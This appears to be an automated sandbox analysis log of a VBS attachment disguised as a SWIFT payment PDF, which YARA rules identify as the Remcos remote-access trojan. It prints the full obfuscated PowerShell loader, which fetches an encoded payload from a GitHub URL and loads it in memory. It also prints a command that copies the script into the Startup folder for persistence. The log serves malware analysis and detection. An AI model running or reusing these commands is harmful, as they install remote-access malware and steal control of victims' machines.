            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041642D GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,10_2_0041642D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,10_2_00414DB4
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042515210_2_00425152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043528610_2_00435286
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004513D410_2_004513D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0045050B10_2_0045050B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043651010_2_00436510
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004316FB10_2_004316FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043569E10_2_0043569E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0044370010_2_00443700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004257FB10_2_004257FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004128E310_2_004128E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0042596410_2_00425964
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041B91710_2_0041B917
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043D9CC10_2_0043D9CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00435AD310_2_00435AD3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00424BC310_2_00424BC3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043DBFB10_2_0043DBFB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0044ABA910_2_0044ABA9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00433C0B10_2_00433C0B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00434D8A10_2_00434D8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0043DE2A10_2_0043DE2A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041CEAF10_2_0041CEAF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00435F0810_2_00435F08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00402073 appears 50 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00432B90 appears 53 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00432525 appears 41 times
            Source: SWIFT 103 202406111301435660 110624-pdf.vbsInitial sample: Strings found which are bigger than 50
            Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 8.2.powershell.exe.180e9fef678.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 8.2.powershell.exe.180e9fef678.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 1396, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: AddInProcess32.exe PID: 1988, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@257/82@15/11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,10_2_00415C90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,10_2_0040E2E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,10_2_00419493
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,10_2_00418A00
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8572:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8272:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5384:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\Chrorne-K04X5E
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8936:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8904:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2316:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3236:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kveck0rz.0zi.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs"
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SWIFT 103 202406111301435660 110624-pdf.vbsVirustotal: Detection: 8%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2360,i,8934632438909745951,2213681595228066499,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2020,i,18065770690636922477,5919200967098741641,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1180,i,15662417021116800271,17959301878097503911,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
